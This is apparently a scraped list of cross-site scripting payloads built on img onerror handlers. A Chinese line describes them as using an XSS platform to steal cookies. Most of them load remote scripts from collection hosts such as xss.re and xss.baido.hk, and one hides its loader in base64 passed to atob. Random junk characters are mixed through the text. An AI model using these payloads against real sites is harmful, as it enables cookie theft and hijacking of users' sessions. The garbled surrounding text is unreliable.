<img src='non-exist.jpg'onerror="alert('xss')">
! k5 r5 A' x: ~7 W, t$ `<img src=# onerror=alert(123)>. Q" e- E1 x( [% g. D
<img src=# onerror=alert(document.cookie)>
5 a3 g: W% q& ^5 E2 z下面是利用平台钓cookie的
) l# a8 b8 f' C; {& n8 w+ v0 ]' ]# [# ^ <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>% M0 U3 n1 X$ t4 y
J; D8 j$ R% I5 T
$ r: E" j0 l6 M- j" P7 }8 {6 t; Z<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>+ X$ @8 e9 o& q6 l$ N# g
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>3 U% q, @. d: P+ x3 A+ p+ x
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>& d7 ]% j c+ ^7 L* G
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
" q F1 i4 B3 \4 w q1 O4 I: @<img src="#">
( U' \. R; H Q( I- Q0 Y0 ]<img src="#">8 m+ n2 g5 f$ w0 K3 n" o8 `. |
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>& Q B& R& f% p6 S8 A2 q
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
7 N% _ n4 _8 C2 S O+ U1 w' `- K<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>6 U8 {9 P. l" O0 f9 P+ C3 K
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
) v. B' g R, X1 p( u7 F<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
' n) S' ]3 {9 {3 {4 r+ X+ {<img src=x width="0" height="0"></img>
& B" c/ N' `+ p. r _& ]! h<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
5 W; V" ^9 K9 N6 p) W6 \3 u<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>) p3 C' H2 b1 M2 W
|